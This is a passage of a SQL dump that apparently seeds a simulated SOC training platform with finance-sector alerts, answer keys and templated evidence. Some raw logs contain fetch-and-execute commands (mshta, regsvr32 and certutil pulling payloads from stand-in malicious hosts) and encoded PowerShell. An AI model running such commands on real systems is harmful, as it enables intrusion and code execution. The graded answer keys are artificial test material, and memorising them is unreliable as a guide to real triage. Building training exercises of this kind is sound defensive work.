detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:05:37Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"swift_operator\\\",\\\"hostname\\\":\\\"swift-server01\\\",\\\"domain\\\":\\\"finance.local\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.953Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:05:37Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"swift_operator\\\",\\\"hostname\\\":\\\"swift-server01\\\",\\\"domain\\\":\\\"finance.local\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.953Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:05:37Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"swift_operator\\\",\\\"hostname\\\":\\\"swift-server01\\\",\\\"domain\\\":\\\"finance.local\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.953Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:05:37Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"swift_operator\\\",\\\"hostname\\\":\\\"swift-server01\\\",\\\"domain\\\":\\\"finance.local\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.953Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:05:37Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"swift_operator\\\",\\\"hostname\\\":\\\"swift-server01\\\",\\\"domain\\\":\\\"finance.local\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1413, 'Data Exfiltration Using Legitimate Cloud Services', 'critical', 'CrowdStrike', 'Data exfiltration to a GitHub repository detected, using legitimate cloud services to evade detection.', 'Data Exfil', 'T1567', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T06:55:18Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.75\",\"dst_ip\":\"140.82.113.3\",\"username\":\"data_analyst\",\"hostname\":\"data-server\",\"domain\":\"github.com\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP transmitting data externally\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"github.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"GitHub used for data exfiltration in past cases\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Using GitHub for data exfiltration is a tactic to fly under the radar by leveraging legitimate services. Immediate investigation is required.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1414, 'APT28 Supply Chain Attack Detected', 'critical', 'Wazuh', 'Indicators of a supply chain attack were found, potentially impacting financial software updates.', 'Supply Chain', 'T1195', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T07:42:27Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.5.55\",\"username\":\"software_update\",\"hostname\":\"update-server\",\"command_line\":\"mshta.exe http://malicious-updates.com/update.hta\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server executing malicious update script\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-updates.com/update.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious HTA file used in supply chain attacks\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"mshta.exe http://malicious-updates.com/update.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"mshta used to execute malicious HTML application\"}}],\"expected_actions\":[\"block_url\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"supply_chain\",\"analysis_notes\":\"The use of mshta to execute a malicious script from a known bad URL indicates a supply chain attack, likely impacting software integrity.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.957Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T07:42:27Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.55\\\",\\\"username\\\":\\\"software_update\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"command_line\\\":\\\"mshta.exe http://malicious-updates.com/update.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.957Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T07:42:27Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.55\\\",\\\"username\\\":\\\"software_update\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"command_line\\\":\\\"mshta.exe http://malicious-updates.com/update.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.957Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T07:42:27Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.55\\\",\\\"username\\\":\\\"software_update\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"command_line\\\":\\\"mshta.exe http://malicious-updates.com/update.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.957Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T07:42:27Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.55\\\",\\\"username\\\":\\\"software_update\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"command_line\\\":\\\"mshta.exe http://malicious-updates.com/update.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.957Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T07:42:27Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.55\\\",\\\"username\\\":\\\"software_update\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"command_line\\\":\\\"mshta.exe http://malicious-updates.com/update.hta\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1415, 'Lazarus Group Trading Fraud Detected', 'critical', 'Firewall', 'Anomalous trading activities detected, consistent with known Lazarus Group financial fraud operations.', 'Trading Fraud', 'T1210', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:25:14Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.6.30\",\"dst_ip\":\"172.16.0.10\",\"username\":\"trader.bob\",\"hostname\":\"trade-station01\",\"domain\":\"stock.exchange.local\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.6.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in suspicious trading activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"stock.exchange.local\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal domain for trading operations\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"fraud\",\"analysis_notes\":\"The detected anomalies match patterns of Lazarus Group\'s known financial fraud activities. Immediate investigation and containment required.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1416, 'APT41 Spear-Phishing Attack with Encoded PowerShell Command', 'critical', 'Proofpoint', 'A spear-phishing email targeting the HR department was detected. The email contained a macro-enabled Excel document with an encoded PowerShell command leading to a C2 domain.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.1.2.45\",\"username\":\"j.doe@financecorp.com\",\"hostname\":\"HR-Desktop-07\",\"email_sender\":\"hr-support@external.com\",\"command_line\":\"powershell.exe -enc W3Bhc3N3b3JkID0gJ1Bhc3N3b3JkMTIzJyA7IFtzeXN0ZW0uTmV0LlNlcnZpY2VzLkRucENsaWVudF0uR2V0SG9zdEJ5TmFtZSgnY21kLmRvbWFpbi5jb20nKS5BZGRyZXNz\"}', '2026-03-02 03:14:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 112 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"hr-support@external.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Domain associated with previous phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -enc W3Bhc3N3b3JkID0gJ1Bhc3N3b3JkMTIzJyA7IFtzeXN0ZW0uTmV0LlNlcnZpY2VzLkRucENsaWVudF0uR2V0SG9zdEJ5TmFtZSgnY21kLmRvbWFpbi5jb20nKS5BZGRyZXNz\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command leading to potential C2 communication\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was identified as a spear-phishing attempt due to the encoded PowerShell command targeting internal HR systems.\"}', 'Advanced', 'MAL', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"APT41 Spear-Phishing Attack with Encoded PowerShell Command\",\"date\":\"2026-03-02T13:55:06.962Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1417, 'Lazarus Group Lateral Movement via LOLBins', 'high', 'Wazuh', 'Detected usage of regsvr32 for executing a malicious script internally, indicating lateral movement attempts by Lazarus Group.', 'Lateral Movement', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:45:21Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.3.25\",\"dst_ip\":\"10.1.3.30\",\"username\":\"service.admin\",\"hostname\":\"Finance-Server-03\",\"command_line\":\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\"}', '2026-03-02 03:14:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.3.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the source machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.3.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the destination machine\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command associated with malicious activity for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Usage of regsvr32 to execute scripts is a known technique for lateral movement, matching patterns used by Lazarus Group.\"}', 'Advanced', 'MAL', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.963Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.3.25\\\",\\\"dst_ip\\\":\\\"10.1.3.30\\\",\\\"username\\\":\\\"service.admin\\\",\\\"hostname\\\":\\\"Finance-Server-03\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.963Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.3.25\\\",\\\"dst_ip\\\":\\\"10.1.3.30\\\",\\\"username\\\":\\\"service.admin\\\",\\\"hostname\\\":\\\"Finance-Server-03\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.963Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.3.25\\\",\\\"dst_ip\\\":\\\"10.1.3.30\\\",\\\"username\\\":\\\"service.admin\\\",\\\"hostname\\\":\\\"Finance-Server-03\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.963Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.3.25\\\",\\\"dst_ip\\\":\\\"10.1.3.30\\\",\\\"username\\\":\\\"service.admin\\\",\\\"hostname\\\":\\\"Finance-Server-03\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.963Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.1.3.25\\\",\\\"dst_ip\\\":\\\"10.1.3.30\\\",\\\"username\\\":\\\"service.admin\\\",\\\"hostname\\\":\\\"Finance-Server-03\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://malicious-site.com/script.sct scrobj.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1418, 'APT29 Data Exfiltration via Encoded Powershell', 'critical', 'CrowdStrike', 'APT29\'s stealthy data exfiltration attempt using encoded PowerShell commands to communicate with an external C2 server.', 'Data Exfil', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T12:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.2.4.15\",\"dst_ip\":\"203.0.113.56\",\"username\":\"analyst.dave\",\"hostname\":\"Trade-Workstation-12\",\"command_line\":\"powershell.exe -enc UwBvAHUAcgBjAGUAPQBoAHQAdABwADoALwAvAGMAbQBkAC4AZABvAG0AYQBpAG4ALgBjAG8AbQAvAGMAbwBtAG0AYQBuAGQALgBwAHMAMwA=\",\"domain\":\"cmd.domain.com\"}', '2026-03-02 03:14:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 infrastructure for APT29\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc UwBvAHUAcgBjAGUAPQBoAHQAdABwADoALwAvAGMAbQBkAC4AZABvAG0AYQBpAG4ALgBjAG8AbQAvAGMAbwBtAG0AYQBuAGQALgBwAHMAMwA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"cmd.domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used for C2 communication in APT29 operations\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of encoded PowerShell for data exfiltration is consistent with APT29\'s tactics, techniques, and procedures.\"}', 'Advanced', 'MAL', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1419, 'APT28 Internal Reconnaissance with Certutil', 'high', 'Splunk', 'APT28 was observed conducting internal reconnaissance using certutil to download a reconnaissance tool within the network.', 'Lateral Movement', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T14:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.3.5.10\",\"dst_ip\":\"10.3.5.20\",\"username\":\"it.support\",\"hostname\":\"Server-Admin-01\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\"}', '2026-03-02 03:14:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.3.5.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for potential reconnaissance\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used to download malicious tools\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Certutil was used to download a file, a common method for internal reconnaissance, in line with APT28\'s known behavior.\"}', 'Advanced', 'MAL', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.966Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.3.5.10\\\",\\\"dst_ip\\\":\\\"10.3.5.20\\\",\\\"username\\\":\\\"it.support\\\",\\\"hostname\\\":\\\"Server-Admin-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.966Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.3.5.10\\\",\\\"dst_ip\\\":\\\"10.3.5.20\\\",\\\"username\\\":\\\"it.support\\\",\\\"hostname\\\":\\\"Server-Admin-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.966Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.3.5.10\\\",\\\"dst_ip\\\":\\\"10.3.5.20\\\",\\\"username\\\":\\\"it.support\\\",\\\"hostname\\\":\\\"Server-Admin-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.966Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.3.5.10\\\",\\\"dst_ip\\\":\\\"10.3.5.20\\\",\\\"username\\\":\\\"it.support\\\",\\\"hostname\\\":\\\"Server-Admin-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.966Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.3.5.10\\\",\\\"dst_ip\\\":\\\"10.3.5.20\\\",\\\"username\\\":\\\"it.support\\\",\\\"hostname\\\":\\\"Server-Admin-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1420, 'Fancy Bear Credential Dump using mshta', 'critical', 'Cuckoo Sandbox', 'Detected mshta used to execute a malicious HTA file to dump credentials, linked to Fancy Bear\'s operations.', 'Credential Access', 'T1170', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T16:05:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.4.6.50\",\"dst_ip\":\"10.4.6.51\",\"username\":\"finance.mgr\",\"hostname\":\"Finance-PC-11\",\"command_line\":\"mshta http://malicious-site.com/malicious.hta\"}', '2026-03-02 03:14:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.4.6.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, potentially compromised\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta http://malicious-site.com/malicious.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Execution of HTA files is a known technique for credential dumping\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of mshta to execute malicious HTA files aligns with Fancy Bear\'s credential access 